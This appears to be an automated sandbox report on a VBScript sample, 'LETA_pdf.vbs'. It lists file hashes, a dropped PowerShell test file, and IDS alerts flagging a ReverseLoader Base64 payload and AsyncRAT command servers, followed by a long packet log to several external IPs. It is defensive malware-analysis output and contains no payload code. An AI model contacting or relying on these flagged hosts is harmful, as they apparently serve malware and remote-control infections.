                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        File type:Unicode text, UTF-16, little-endian text, with very long lines (368), with CRLF line terminators
                                                                                                        Entropy (8bit):3.529509303223436
                                                                                                        TrID:
                                                                                                        • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                                                                        • MP3 audio (1001/1) 32.22%
                                                                                                        • Lumena CEL bitmap (63/63) 2.03%
                                                                                                        • Corel Photo Paint (41/41) 1.32%
                                                                                                        File name:LETA_pdf.vbs
                                                                                                        File size:12'486 bytes
                                                                                                        MD5:8825e4591cadaec1fb1d0082f84c2398
                                                                                                        SHA1:39fca0a522686f7b9b2b9dc5e5874aebcf231159
                                                                                                        SHA256:61db47c10daf54a56360bbfa26f2127a31fadfc766220384eff41153d31d23fa
                                                                                                        SHA512:d5b9c70136aaef8ca9aa1dfb32225632b69de90310ba4f9dcf35567ed58cfd6da8a6fbede4714a19ff41310af0e04bc54c7c6a95060840918efc5a31893fa2c9
                                                                                                        SSDEEP:96:J86ymyaynXnLbv+mfupmtsgOgjAC9LFgtYif8fTFsgH2vX5bUdnL7vcumuZ4Y5Wx:JttRS/GpqDzj1eUhDH2Rb8RX1GHRkfkx
                                                                                                        TLSH:21424512A3FA0A08F6F75F59997A55384E7BBE65583DD21C019C290E0BF3E40C925BB3
                                                                                                        File Content Preview:..........F.u.n.c.t.i.o.n. .t.e.c.t.i.p.e.n.n.a.s.(.p.r.i.n.t.T.i.c.k.e.t.,. .s.c.r.i.p.t.C.o.n.t.e.x.t.,. .p.r.i.n.t.C.a.p.a.b.i.l.i.t.i.e.s.)..... . . . .D.i.m. .a.v.e.s.p.a.,. .e.n.g.r.a.v.e.s.c.e.r..... . . . .S.e.t. .a.v.e.s.p.a. .=. .p.r.i.n.t.C.a.p
                                                                                                        Icon Hash:68d69b8f86ab9a86
                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2024-11-20T20:33:32.055504+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649708172.67.187.200443TCP
                                                                                                        2024-11-20T20:33:53.683441+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.215.209.78443192.168.2.649734TCP
                                                                                                        2024-11-20T20:34:11.866457+01002057635ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound1108.181.20.35443192.168.2.649785TCP
                                                                                                        2024-11-20T20:34:11.866457+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1108.181.20.35443192.168.2.649785TCP
                                                                                                        2024-11-20T20:34:18.262876+01002842478ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)1181.71.217.1144203192.168.2.649804TCP
                                                                                                        2024-11-20T20:34:18.262876+01002030673ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)1181.71.217.1144203192.168.2.649804TCP
                                                                                                        2024-11-20T20:34:18.262876+01002035595ET MALWARE Generic AsyncRAT Style SSL Cert1181.71.217.1144203192.168.2.649804TCP
                                                                                                        2024-11-20T20:34:18.262876+01002035607ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)1181.71.217.1144203192.168.2.649804TCP
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Nov 20, 2024 20:33:29.295718908 CET4970780192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:29.419389009 CET8049707172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:29.419578075 CET4970780192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:29.419833899 CET4970780192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:29.539483070 CET8049707172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:30.780643940 CET8049707172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:30.780946970 CET4970780192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:30.782202005 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:30.782236099 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:30.782305956 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:30.784507990 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:30.784523964 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:30.901400089 CET8049707172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:30.901458025 CET4970780192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.055428028 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.055504084 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.060095072 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.060103893 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.060487986 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.109781981 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.114521027 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.159322977 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.596652985 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.596728086 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.596762896 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.596797943 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.596807003 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.596852064 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.596853971 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.596869946 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.596920013 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.604837894 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.609982967 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.610053062 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.610063076 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.656799078 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.716129065 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.720268011 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.720377922 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.720405102 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.766104937 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.798095942 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.803220034 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.803297997 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.803383112 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.810910940 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.811016083 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.811036110 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.818772078 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.818850040 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.818865061 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.826487064 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.826695919 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.826714993 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.841912985 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.841960907 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.842022896 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.842040062 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.842099905 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.849811077 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.857494116 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.857726097 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.857758045 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.857796907 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.857873917 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.863706112 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.870289087 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.870373011 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.870397091 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.876435995 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.876504898 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.876535892 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.882453918 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.882523060 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.882539034 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.938030005 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.938049078 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:32.984865904 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:32.998903036 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.001282930 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.001362085 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.001379967 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.007308960 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.007685900 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.007700920 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.011761904 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.011841059 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.011853933 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.011935949 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.020389080 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.020397902 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.020468950 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.028599977 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.028614998 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.028696060 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.036782026 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.036789894 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.036864996 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.040879011 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.040956020 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.045006990 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.045013905 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.045085907 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.053488970 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.053572893 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.061471939 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.061583996 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.069665909 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.069742918 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.073807001 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.073887110 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.082001925 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.082086086 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.086349964 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.086448908 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.094340086 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.094420910 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.102546930 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.102636099 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.203439951 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.203568935 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.207721949 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.207809925 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.214066982 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.214164019 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.217367887 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.217443943 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.223377943 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.223457098 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.229162931 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.229244947 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.232203007 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.232283115 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.234946012 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.235013008 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.235040903 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.235073090 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.235106945 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.235162020 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.236418962 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.236454964 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:33.236557007 CET49708443192.168.2.6172.67.187.200
                                                                                                        Nov 20, 2024 20:33:33.236573935 CET44349708172.67.187.200192.168.2.6
                                                                                                        Nov 20, 2024 20:33:46.882649899 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:46.882687092 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:46.882860899 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:46.894403934 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:46.894418001 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:48.854604006 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:48.854691982 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:48.856930971 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:48.856940031 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:48.857224941 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:48.864165068 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:48.911330938 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.209994078 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.210021973 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.210083961 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.210093021 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.243835926 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.243910074 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.243916988 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.297291994 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.329590082 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.329605103 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.329643965 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.329685926 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.329736948 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.444185972 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.444202900 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.444269896 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.444278002 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.466800928 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.466831923 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.466886997 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.466893911 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.466903925 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.493402958 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.493417025 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.493480921 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.493491888 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.517554998 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.517571926 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.517604113 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.517682076 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.517682076 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.517693043 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.562937975 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.689798117 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.689811945 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.689836025 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.689866066 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.689930916 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.703175068 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.703212976 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.703234911 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.703274965 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.703485012 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.703494072 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.716399908 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.716423988 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.716473103 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.716484070 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.716526031 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.733886957 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.733911037 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.733953953 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.733961105 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.734018087 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.747236013 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.747272968 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.747308969 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.747360945 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.747369051 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.747411013 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.760399103 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.760422945 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.760459900 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.760502100 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.760516882 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.777951002 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.778012037 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.778018951 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.828566074 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.902379036 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.902421951 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.902460098 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.902461052 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.902524948 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.902533054 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.912434101 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.912460089 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.912489891 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.912499905 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.912549019 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.922435045 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.922456980 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.922528982 CET49734443192.168.2.6142.215.209.78
